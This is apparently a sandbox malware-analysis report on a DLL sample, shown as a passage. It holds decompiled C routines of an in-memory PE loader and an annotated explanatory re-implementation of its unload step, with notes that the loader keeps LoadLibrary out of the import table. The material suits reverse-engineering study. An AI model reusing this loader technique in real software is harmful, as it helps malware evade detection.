							HeapDestroy( *0x10333310); // failure path: destroy the private heap whose handle is kept in the global at 0x10333310
							 *0x10333310 =  *0x10333310 & 0x00000000; // decompiler's rendering of storing 0 to the global handle
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

Instruction addresses for the decompiled lines above (report column, in order): 0x1000f7d0 0x1000f7d8 0x1000f7dd 0x1000f7e2 0x1000f7e7 0x1000f7ea 0x1000f7ef 0x1000f815 0x1000f817 0x1000f818 0x1000f7f1 0x1000f7f6 0x1000f7fb 0x1000f7fe 0x00000000 0x1000f800 0x1000f806 0x1000f80c 0x00000000 0x1000f80c 0x1000f7fe 0x1000f7df 0x1000f7df 0x1000f7e1 0x1000f7e1

APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
• HeapDestroy.KERNEL32 ref: 1000F806
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Heap$CreateDestroy
• String ID:
• API String ID: 3296620671-0
• Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
• Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
• Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
• Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 76%
			E1001A960(void* _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				void* _t49;
				void* _t52;
				intOrPtr _t60;
				void* _t68;
				void* _t70;
				signed int _t76;
				signed int _t87;
				signed int _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t49 = _a4;
				_v8 = _t49; // _a4: loader-private descriptor of an in-memory module; fields read at +0, +4, +8, +0xc, +0x10, +0x20, +0x2c, +0x30, +0x34
				if(_v8 != 0) {
					__eflags =  *(_v8 + 0x10); // +0x10: non-zero once the module's entry point has been run
					if(__eflags != 0) {
						_t9 =  *_v8 + 0x28; // 0x1ab2068 -- +0 is the mapped IMAGE_NT_HEADERS32; +0x28 inside it is OptionalHeader.AddressOfEntryPoint
						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9; // +4 is the image base; base + entry RVA = entry point VA
						__eflags = _t93;
						_v12 = _t93;
						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0); // DllMain(base, 0 = DLL_PROCESS_DETACH, NULL)
					}
					_push( *((intOrPtr*)(_v8 + 0x30)));
					E1000CA30(_t68, _t94, _t95, __eflags); // E1000CA30 is handed the buffer at +0x30 here and the handle array below, consistent with a free helper; its body is not in this excerpt
					_t97 = _t96 + 4;
					_t70 = _v8;
					__eflags =  *(_t70 + 8); // +8: array of handles for the modules the image imports
					if( *(_t70 + 8) == 0) {
						L12:
						_t52 = _v8;
						__eflags =  *(_t52 + 4);
						if( *(_t52 + 4) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed -- callback at +0x20 with (base, 0, 0x8000 = MEM_RELEASE, userdata at +0x34): VirtualFree-style release of the mapping
						}
						return HeapFree(GetProcessHeap(), 0, _v8); // the descriptor itself lives on the process heap
					} else {
						_v16 = 0;
						while(1) {
							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc)); // +0xc: number of entries in the handle array
							if(__eflags >= 0) {
								break;
							}
							_t60 =  *((intOrPtr*)(_v8 + 8));
							_t76 = _v16;
							__eflags =  *(_t60 + _t76 * 4);
							if( *(_t60 + _t76 * 4) != 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed -- callback at +0x2c with (handle, userdata): FreeLibrary-style release of each non-NULL import
								_t97 = _t97 + 8;
							}
							_t87 = _v16 + 1;
							__eflags = _t87;
							_v16 = _t87;
						}
						_push( *((intOrPtr*)(_v8 + 8)));
						E1000CA30(_t68, _t94, _t95, __eflags); // free the handle array
						_t97 = _t97 + 4;
						goto L12;
					}
				}
				return _t49; // NULL descriptor: nothing to tear down
			}

Instruction addresses for the decompiled lines above (report column, in order): 0x1001a966 0x1001a969 0x1001a970 0x1001a97a 0x1001a97e 0x1001a98b 0x1001a98b 0x1001a98b 0x1001a98e 0x1001a99c 0x1001a99c 0x1001a9a5 0x1001a9a6 0x1001a9ab 0x1001a9ae 0x1001a9b1 0x1001a9b5 0x1001aa13 0x1001aa13 0x1001aa16 0x1001aa1a 0x1001aa37 0x1001aa39 0x00000000 0x1001a9b7 0x1001a9b7 0x1001a9c9 0x1001a9cf 0x1001a9d2 0x00000000 0x00000000 0x1001a9d7 0x1001a9da 0x1001a9dd 0x1001a9e1 0x1001a9fd 0x1001a9ff 0x1001a9ff 0x1001a9c3 0x1001a9c3 0x1001a9c6 0x1001a9c6 0x1001aa0a 0x1001aa0b 0x1001aa10 0x00000000 0x1001aa10 0x1001a9b5 0x00000000

APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA3C), ref: 1001AA42
• HeapFree.KERNEL32(00000000,?,?,1001BA3C), ref: 1001AA49
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
• Instruction ID: 4d02d4e2172aadf48441733df7480d9fc57cbb1c8efede5bdbb7e0f8d5fbe0c0
• Opcode Fuzzy Hash: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
• Instruction Fuzzy Hash: B431A178A00108EFDB04DF94CA94AADB7B6FF89304F248198E9055B395C775EE85DB81
Uniqueness
Uniqueness Score: -1.00%
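The routine E1001A960 above reads a descriptor at fixed offsets, calls the image's entry point with reason 0, hands every non-NULL import handle to a callback stored at +0x2c, hands the image base to a callback at +0x20 with 0x8000 (MEM_RELEASE), and finally frees the descriptor. That sequence is the unload half of a manual PE mapper. The following is an added example, not code from the report or from the sample, that re-expresses the same teardown with named fields so the offsets can be read against the decompiled output. Everything named here is an assumption: the struct and field names, the callback names, malloc/free standing in for the sample's E1000CA30 and HeapFree(GetProcessHeap(), 0, ...), and the constructed descriptor, fake headers and recording callbacks that let it run without a real PE.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define DLL_PROCESS_DETACH 0       /* second argument of the entry-point call in E1001A960 */
#define MEM_RELEASE        0x8000  /* third argument of the +0x20 callback */

/* Callback shapes taken from the argument lists at the two indirect calls. */
typedef int  (*entry_fn)(void *base, uint32_t reason, void *reserved);
typedef void (*free_library_fn)(void *module, void *userdata);                      /* +0x2c */
typedef int  (*release_fn)(void *addr, size_t size, uint32_t type, void *userdata);  /* +0x20 */

/* Descriptor reconstructed from the offsets the routine reads; the field order
   reproduces those offsets on a 32-bit build. Field names are assumptions. */
struct mapped_module {
    uint8_t         *headers;       /* +0x00 mapped IMAGE_NT_HEADERS32 */
    uint8_t         *code_base;     /* +0x04 base of the mapped image */
    void           **modules;       /* +0x08 handles of resolved imports */
    uint32_t         num_modules;   /* +0x0c */
    uint32_t         initialized;   /* +0x10 non-zero once the entry point ran */
    void            *unused1[3];    /* +0x14..+0x1c not read by this routine */
    release_fn       release;       /* +0x20 VirtualFree-style callback */
    void            *unused2[2];    /* +0x24, +0x28 not read by this routine */
    free_library_fn  free_library;  /* +0x2c FreeLibrary-style callback */
    void            *buffer_0x30;   /* +0x30 freed before the import loop */
    void            *userdata;      /* +0x34 passed to both callbacks */
};

/* What the stand-in callbacks observed during one teardown. */
struct teardown_trace { int entry_calls, imports_freed, release_calls; uint32_t entry_reason, release_type; };
static struct teardown_trace g_trace;

/* Same control flow as E1001A960. malloc/free stand in for the sample's
   E1000CA30 and HeapFree(GetProcessHeap(), 0, ...). Returns 1 when a
   descriptor was torn down, 0 for a NULL argument. */
int unload_mapped_module(struct mapped_module *mod)
{
    if (mod == NULL) return 0;
    if (mod->initialized) {
        /* OptionalHeader.AddressOfEntryPoint sits at +0x28 of IMAGE_NT_HEADERS32 */
        uint32_t entry_rva;
        memcpy(&entry_rva, mod->headers + 0x28, sizeof entry_rva);
        entry_fn entry = (entry_fn)((uintptr_t)mod->code_base + entry_rva);
        entry(mod->code_base, DLL_PROCESS_DETACH, NULL);    /* DllMain(base, DETACH, 0) */
    }
    free(mod->buffer_0x30);
    if (mod->modules != NULL) {
        for (uint32_t i = 0; i < mod->num_modules; i++)
            if (mod->modules[i] != NULL)
                mod->free_library(mod->modules[i], mod->userdata);
        free(mod->modules);
    }
    if (mod->code_base != NULL)
        mod->release(mod->code_base, 0, MEM_RELEASE, mod->userdata);
    free(mod);
    return 1;
}

/* Stand-in callbacks: they only record how they were called. */
static int demo_entry(void *base, uint32_t reason, void *reserved) {
    (void)base; (void)reserved; g_trace.entry_calls++; g_trace.entry_reason = reason; return 1;
}
static void demo_free_library(void *module, void *userdata) {
    (void)module; (void)userdata; g_trace.imports_freed++;
}
static int demo_release(void *addr, size_t size, uint32_t type, void *userdata) {
    (void)addr; (void)size; (void)userdata; g_trace.release_calls++; g_trace.release_type = type; return 1;
}

/* Builds a constructed descriptor (no real PE involved) and tears it down.
   The fake headers carry an entry RVA, and code_base is chosen so that
   base + RVA resolves to demo_entry, the way the sample locates DllMain. */
const struct teardown_trace *run_demo(void)
{
    const uint32_t entry_rva = 0x1000;
    struct mapped_module *mod = calloc(1, sizeof *mod);
    uint8_t *headers = calloc(1, 0x100);
    void **imports = calloc(3, sizeof *imports);
    if (mod == NULL || headers == NULL || imports == NULL) abort();
    memset(&g_trace, 0, sizeof g_trace);
    memcpy(headers + 0x28, &entry_rva, sizeof entry_rva);
    imports[0] = (void *)0x10;          /* constructed handles; slot 1 stays NULL */
    imports[2] = (void *)0x20;
    mod->headers      = headers;
    mod->code_base    = (uint8_t *)((uintptr_t)demo_entry - entry_rva);
    mod->modules      = imports;
    mod->num_modules  = 3;
    mod->initialized  = 1;
    mod->release      = demo_release;
    mod->free_library = demo_free_library;
    mod->buffer_0x30  = calloc(1, 16);
    unload_mapped_module(mod);          /* frees mod and its buffers; headers are ours */
    free(headers);
    return &g_trace;
}
```

run_demo() returns the recorded trace: one entry-point call with reason 0, two of the three import slots freed (the NULL slot is skipped, as in the decompiled loop), and one release with type 0x8000. When you meet this shape in a dump, the useful reversing facts are the ones the example encodes: +0x20 and +0x2c are caller-supplied function pointers rather than imports, so the image can be mapped and released without LoadLibrary/FreeLibrary appearing in the import table, and the entry RVA is taken from the copied NT headers, so the headers of the hidden module are still present at the descriptor's +0 pointer.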

C-Code - Quality: 34%
			E1001ABA3() {
				signed int _t93;
				intOrPtr _t97;
				signed int _t99;
				signed int _t106;
				signed int _t114;
				void* _t116;
				void* _t121;
				void* _t127;
				signed int _t173;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t187;
                                                                                                                                                
                                                                                                                                                				L0:
                                                                                                                                                				while(1) {
                                                                                                                                                					L0:
                                                                                                                                                					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
                                                                                                                                                					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
                                                                                                                                                						break;
                                                                                                                                                					}
                                                                                                                                                					L3:
                                                                                                                                                					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
                                                                                                                                                					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
                                                                                                                                                					_t186 = _t184 + 8;
                                                                                                                                                					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
                                                                                                                                                					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
                                                                                                                                                						L5:
                                                                                                                                                						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                						_push(4 +  *_t17 * 4);
                                                                                                                                                						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                						_push( *_t21);
                                                                                                                                                						_t99 = E1000E018(_t127,  *_t21, _t180, _t181, __eflags);
                                                                                                                                                						_t187 = _t186 + 8;
                                                                                                                                                						 *(_t182 - 0x18) = _t99;
                                                                                                                                                						__eflags =  *(_t182 - 0x18);
                                                                                                                                                						if( *(_t182 - 0x18) != 0) {
                                                                                                                                                							L7:
                                                                                                                                                							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
                                                                                                                                                							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
                                                                                                                                                							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
                                                                                                                                                							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
                                                                                                                                                							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
                                                                                                                                                							__eflags =  *( *(_t182 - 4));
                                                                                                                                                							if( *( *(_t182 - 4)) == 0) {
                                                                                                                                                								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                								__eflags = _t106;
                                                                                                                                                								 *(_t182 - 0x14) = _t106;
                                                                                                                                                							} else {
                                                                                                                                                								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
                                                                                                                                                								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
                                                                                                                                                							}
                                                                                                                                                							while(1) {
                                                                                                                                                								L12:
                                                                                                                                                								__eflags =  *( *(_t182 - 0x1c));
                                                                                                                                                								if( *( *(_t182 - 0x1c)) == 0) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								L13:
                                                                                                                                                								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
                                                                                                                                                								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
                                                                                                                                                									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
                                                                                                                                                									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
                                                                                                                                                									__eflags = _t114;
                                                                                                                                                									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
                                                                                                                                                									_t187 = _t187 + 0xc;
                                                                                                                                                									 *( *(_t182 - 0x14)) = _t116;
                                                                                                                                                								} else {
                                                                                                                                                									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
                                                                                                                                                									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
                                                                                                                                                									_t187 = _t187 + 0xc;
                                                                                                                                                									 *( *(_t182 - 0x14)) = _t121;
                                                                                                                                                								}
                                                                                                                                                								L16:
                                                                                                                                                								__eflags =  *( *(_t182 - 0x14));
                                                                                                                                                								if( *( *(_t182 - 0x14)) != 0) {
                                                                                                                                                									L18:
                                                                                                                                                									L11:
                                                                                                                                                									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
                                                                                                                                                									_t173 =  *(_t182 - 0x14) + 4;
                                                                                                                                                									__eflags = _t173;
                                                                                                                                                									 *(_t182 - 0x14) = _t173;
                                                                                                                                                									continue;
                                                                                                                                                								} else {
                                                                                                                                                									L17:
                                                                                                                                                									 *(_t182 - 0xc) = 0;
                                                                                                                                                								}
                                                                                                                                                								break;
                                                                                                                                                							}
                                                                                                                                                							L19:
                                                                                                                                                							__eflags =  *(_t182 - 0xc);
                                                                                                                                                							if(__eflags != 0) {
                                                                                                                                                								L21:
                                                                                                                                                								continue;
                                                                                                                                                							} else {
                                                                                                                                                								L20:
                                                                                                                                                								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
                                                                                                                                                								SetLastError(0x7f);
                                                                                                                                                							}
                                                                                                                                                						} else {
                                                                                                                                                							L6:
                                                                                                                                                							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
                                                                                                                                                							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
                                                                                                                                                							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
                                                                                                                                                							SetLastError(0xe);
                                                                                                                                                							 *(_t182 - 0xc) = 0;
                                                                                                                                                						}
                                                                                                                                                					} else {
                                                                                                                                                						L4:
                                                                                                                                                						SetLastError(0x7e);
                                                                                                                                                						 *(_t182 - 0xc) = 0;
                                                                                                                                                					}
                                                                                                                                                					break;
                                                                                                                                                				}
                                                                                                                                                				L22:
                                                                                                                                                				_t93 =  *(_t182 - 0xc);
                                                                                                                                                				return _t93;
                                                                                                                                                			}
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x1001ad3f
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad3d
                                                                                                                                                0x1001ad4d
                                                                                                                                                0x1001ad4d
                                                                                                                                                0x1001ad51
                                                                                                                                                0x1001ad73
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ad53
                                                                                                                                                0x1001ad53
                                                                                                                                                0x1001ad56
                                                                                                                                                0x1001ad61
                                                                                                                                                0x1001ad64
                                                                                                                                                0x1001ad6b
                                                                                                                                                0x1001ad6b
                                                                                                                                                0x1001ac2c
                                                                                                                                                0x1001ac2c
                                                                                                                                                0x1001ac2f
                                                                                                                                                0x1001ac3a
                                                                                                                                                0x1001ac3d
                                                                                                                                                0x1001ac44
                                                                                                                                                0x1001ac4a
                                                                                                                                                0x1001ac4a
                                                                                                                                                0x1001abf2
                                                                                                                                                0x1001abf2
                                                                                                                                                0x1001abf4
                                                                                                                                                0x1001abfa
                                                                                                                                                0x1001abfa
                                                                                                                                                0x00000000
                                                                                                                                                0x1001abf0
                                                                                                                                                0x1001ad78
                                                                                                                                                0x1001ad78
                                                                                                                                                0x1001ad7e

APIs
• IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
• SetLastError.KERNEL32(0000007E), ref: 1001ABF4
• _realloc.LIBCMT ref: 1001AC1B
• SetLastError.KERNEL32(0000000E), ref: 1001AC44
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ErrorLast$Read_realloc
• String ID:
• API String ID: 252108943-0
• Opcode ID: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
• Instruction ID: fc8650bffc04b339d430b1508d1055308318352e03b6944bc6f0970fdcc69cd6
• Opcode Fuzzy Hash: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
• Instruction Fuzzy Hash: B501EF74A00208EFDB04CF94C985B9DB7B1FF49359F608198E90AAB350C378EA81DB60
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 50%
/*
 * Decompiled section-mapping loop (consistent with the "creates a PE file in
 * dynamic memory" signature). Reading of the arguments, inferred from the
 * constants and PE field offsets used below: _a4 = source buffer holding the
 * raw PE, _a8 = its size (passed to a bounds check), _a12 = IMAGE_NT_HEADERS
 * of that PE, _a16 = loader context (NT headers pointer at +0, mapped image
 * base at +4, allocation routine pointer at +0x1c). Offset comments are
 * analyst annotations, not decompiler output.
 */
E1001B300(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
    intOrPtr _v8;     // section index
    intOrPtr _v12;    // address returned by the allocation routine
    intOrPtr _v16;    // SectionAlignment, used for sections without raw data
    intOrPtr _v20;    // base address of the in-memory image
    intOrPtr _v24;    // current IMAGE_SECTION_HEADER
    void* _t78;
    intOrPtr _t82;
    intOrPtr _t95;
    void* _t100;
    void* _t140;
    void* _t141;
    void* _t142;
    void* _t143;
    void* _t144;
    void* _t145;

    _t141 = __esi;
    _t140 = __edi;
    _t100 = __ebx;
    _t2 = _a16 + 4; // 0xe90575c0
    _v20 =  *_t2;                                    // image base of the new mapping
    _t6 =  *_a16 + 0x14; // 0x2b34508b             // IMAGE_FILE_HEADER.SizeOfOptionalHeader
    _t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b95d
    _v24 =  *_a16 + _t8;                             // first section header: NT headers + 0x18 + SizeOfOptionalHeader
    _v8 = 0;
    while(1) {
        _t16 =  *_a16 + 6; // 0xe2e905               // IMAGE_FILE_HEADER.NumberOfSections
        if(_v8 >= ( *_t16 & 0x0000ffff)) {
            break;
        }
        if( *((intOrPtr*)(_v24 + 0x10)) != 0) {      // SizeOfRawData != 0
            _t44 = _v24 + 0x14; // 0x2b34508b         // PointerToRawData
            _t46 = _v24 + 0x10; // 0xb04d8b02         // SizeOfRawData
            _t78 = E1001AE40(_a8,  *_t44 +  *_t46);  // bounds check: raw data must fit inside the source buffer
            _t143 = _t142 + 8;
            if(_t78 != 0) {
                _t49 = _a16 + 0x34; // 0x8b0aeb18
                _t51 = _v24 + 0x10; // 0xb04d8b02
                _t54 = _v24 + 0xc; // 0x8bb8558b      // VirtualAddress
                _t56 = _a16 + 0x1c; // 0x8b1874b4, executed
                // allocation callback at base + VirtualAddress, flags 0x1000/4 match MEM_COMMIT / PAGE_READWRITE
                _t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
                _t144 = _t143 + 0x14;
                _v12 = _t82;
                if(_v12 != 0) {
                    _v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
                    // copy SizeOfRawData bytes from source + PointerToRawData into the mapping (memcpy-like)
                    E1000D190(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
                    _t142 = _t144 + 0xc;
                     *((intOrPtr*)(_v24 + 8)) = _v12;  // record the mapped address in the header's Misc field
                    L1:
                    _v8 = _v8 + 1;
                    _v24 = _v24 + 0x28;              // sizeof(IMAGE_SECTION_HEADER)
                    continue;
                }
                return 0;
            }
            return 0;
        }
        // section with no raw data (e.g. .bss): reserve SectionAlignment bytes and zero them
        _v16 =  *((intOrPtr*)(_a12 + 0x38));         // IMAGE_OPTIONAL_HEADER32.SectionAlignment (NT headers + 0x38)
        if(_v16 <= 0) {
            L8:
            goto L1;
        }
        _t25 = _a16 + 0x34; // 0x8b0aeb18
        _t29 = _v24 + 0xc; // 0x8bb8558b              // VirtualAddress
        _t31 = _a16 + 0x1c; // 0x8b1874b4
        _t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
        _t145 = _t142 + 0x14;
        _v12 = _t95;
        if(_v12 != 0) {
            _v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
             *((intOrPtr*)(_v24 + 8)) = _v12;
            E1000CF20(_t140, _v12, 0, _v16);         // zero-fill (memset-like)
            _t142 = _t145 + 0xc;
            goto L8;
        }
        return 0;
    }
    return 1;
}

                                                                                                                                                0x1001b397
                                                                                                                                                0x1001b3a9
                                                                                                                                                0x1001b3b2
                                                                                                                                                0x1001b3bf
                                                                                                                                                0x1001b3c4
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b3c4
                                                                                                                                                0x00000000
                                                                                                                                                0x1001b399
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2102423945-0
                                                                                                                                                • Opcode ID: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                • Instruction ID: a005275a1ccb32e2261c4421282f910c29d49b3246cd882dcb7603a91dee7caf
                                                                                                                                                • Opcode Fuzzy Hash: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                • Instruction Fuzzy Hash: 7951A7B4A0010ADFCB04DF94D991EAEB7B5FF48304F248599E915AB346D730EE91CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001AAF0(void* __ecx, CHAR* _a4) {
                                                                                                                                                				struct HINSTANCE__* _v8;
                                                                                                                                                				struct HINSTANCE__* _t6;
                                                                                                                                                
                                                                                                                                                				_t6 = LoadLibraryA(_a4); // executed
                                                                                                                                                				_v8 = _t6;
                                                                                                                                                				if(_v8 != 0) {
                                                                                                                                                					return _v8;
                                                                                                                                                				}
                                                                                                                                                				return 0;
                                                                                                                                                			}





                                                                                                                                                0x1001aaf8
                                                                                                                                                0x1001aafe
                                                                                                                                                0x1001ab05
                                                                                                                                                0x00000000
                                                                                                                                                0x1001ab0b
                                                                                                                                                0x00000000

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                • Opcode ID: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                • Instruction ID: 175513b2d3b99921c95d5b3868ca5ca2b884793c4c363252687910afe3f21655
                                                                                                                                                • Opcode Fuzzy Hash: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                • Instruction Fuzzy Hash: 4CD0927490924CEBCB10DFA4DA88A8EB7F8EB09251F208595FC0997201D631DE809AA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E1001AAC0(struct HINSTANCE__* _a4) {
                                                                                                                                                				int _t3;
